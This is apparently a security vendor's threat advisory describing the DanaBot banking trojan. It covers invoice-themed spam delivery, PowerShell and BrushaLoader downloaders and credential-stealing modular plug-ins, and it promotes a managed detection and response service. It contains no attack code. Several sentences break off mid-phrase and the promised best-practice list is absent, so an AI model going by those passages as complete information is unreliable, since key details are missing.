Security researchers from ESET recently discovered a banking trojan named DanaBot (detected by Trend Micro as TROJ_BANLOAD.THFOAAH) being distributed to European countries via spam emails. Here’s what you need to know about this threat, how users and businesses can defend against it, and how managed detection and response can help address this threat.
DanaBot is a banking trojan, written in Delphi programming language, capable of stealing credentials and hijacking infected systems. It is distributed via spam emails masquerading as invoices with
When it was first discovered, DanaBot used Word documents embedded with
DanaBot was first seen being distributed to Australian users via spam with a malicious Word document that claims the user is “protected” by a security company. DanaBot’s command-and-control (C&C) server first checks the affected system’s IP
DanaBot’s operators have since expanded their targets. The recent spam campaigns are now being distributed to European countries, particularly Austria, Germany, Italy, Poland, and Ukraine. While the missives still pose as invoices, PowerShell and BrushaLoader are used to download DanaBot’s various components.
[Trend Micro 2018 Midyear Security Roundup: Fileless, macro
DanaBot is notable for its multistage infection chain and modular architecture. Prior research from Trustwave, along with ESET's new research, identifies DanaBot as comprising several components — mostly as dynamic-link libraries (DLL) — that perform separate functions. The identified plug-ins steal credentials from various applications, functions as RDP (Remote Desktop Protocol) to other Windows-based computers, injects scripts to browsers, among others.
[Best Practices: InfoSec Guide: Web Injections]
While modular malware isn’t new, it can pose significant risks given its stealthy nature. In fact, this technique is increasingly used by botnets, other information and file stealers, Android malware, point-of-sale (PoS) malware, and even cyberespionage campaigns. Modular malware can be difficult to detect. For instance, a module can be programmed to terminate or not work without running another, so a malware component can dwell within an affected system for a long time until it is executed. Attackers can also program a module to self-execute and not rely on other components. In this case, a malware can execute information theft while letting its other components that have other functionalities remain hidden. Uncovering a component doesn’t guarantee others can be found either.
Defending against modular malware like DanaBot requires a multilayered approach. Here are some best practices:
Ideally, businesses should have the necessary security mechanisms in place to defend against stealthy threats, but enterprises may find it arduous given budget constraints (like in hiring or retaining security specialists) or the worsening cybersecurity skills gap. A security strategy that enterprises can consider is using managed detection and response (MDR), which provides comprehensive threat hunting services and access to security specialists that can help enterprises investigate, proactively respond to, and remediate from evasive threats.
For example, detecting or blocking a modular malware’s component doesn’t ensure that its other plug-ins can be found. In a modular PoS malware like FastPOS, for instance, its random access memory-scraping module (RAM) can run as a service
Trend Micro’s managed detection and response service allows customers to investigate security alerts without the need to hire qualified incident response staff. It provides alert monitoring, alert prioritization, investigation, and threat hunting services to Trend Micro customers. By applying artificial intelligence models to customer endpoint data, network data, and server information, the service can correlate and prioritize advanced threats. Trend Micro threat researchers can investigate prioritized alerts to determine the extent and spread of the attack and work with the customer to provide a detailed remediation plan.
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.